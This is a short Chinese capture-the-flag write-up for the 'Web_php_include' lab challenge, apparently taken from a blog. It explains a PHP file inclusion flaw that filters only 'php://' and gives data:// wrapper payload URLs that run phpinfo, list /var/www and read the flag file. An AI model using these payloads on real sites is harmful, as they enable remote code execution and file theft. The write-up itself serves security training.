32.攻防世界Web_php_include

进入场景

echo $_GET['hello'] 直接将用户通过 GET 方法提交的 hello 参数值输出到页面上,这可能会导致 XSS(跨站脚本攻击)漏洞。

在下面的代码中,虽然对 page 中的 php:// 进行了替换处理,但是仍然存在文件包含漏洞的风险。如果我们能够通过 _GET['page'] 传入一个恶意的文件路径,就可能导致服务器上的任意文件被包含和执行

"file://"是一种用于指定本地文件系统中文件的URI(统一资源标识符)协议。通过"file://"协议,可以在浏览器或其他支持该协议的应用程序中访问本地文件

"data://"协议是 PHP 中的一种数据流协议,它允许将数据作为文件来读取。该协议的语法如下:data:(<mediatype>)(;base64),<data>,其中,<mediatype>是可选的媒体类型,<data>是数据内容。

测试

/?page=data://text/plain,<?php phpinfo()?>

目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']; ?>

目录文件

/?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

读取文件内容

/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>

相关推荐
宵时待雨9 小时前
linux笔记归纳1:linux初识
linux·运维·笔记
Keep Running *9 小时前
Docker_学习笔记
笔记·学习·docker
lingggggaaaa9 小时前
PHP模型开发篇&MVC层&RCE执行&文件对比法&1day分析&0day验证
开发语言·学习·安全·web安全·php·mvc
jinanwuhuaguo9 小时前
OpenClaw v2026.4.5 深度解读剖析:安全架构的终极硬化与生态治理的范式转型
大数据·人工智能·安全·安全架构·openclaw
wal13145209 小时前
OpenClaw 2026.4.5:视频/音乐生成内置,11 种语言支持,多个安全修复
运维·服务器·人工智能·安全·openclaw
一名优秀的码农9 小时前
vulhub系列-58-Funbox: Scriptkiddie(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
AI视觉网奇10 小时前
transformer 优化笔记 持续更新
笔记
Amazing_Cacao18 小时前
深度观察 | 从“产区玄学”到“液态战场”:精品巧克力的终极试金石
学习
张同学0319 小时前
220V 转 12V/5V 电源输入电路设计笔记
笔记·嵌入式硬件·硬件工程
深蓝海拓19 小时前
S7-1500PLC学习笔记:MOVE_BLK、MOVE_BLK_VARIANT、BLKMOV的区别
笔记·学习·plc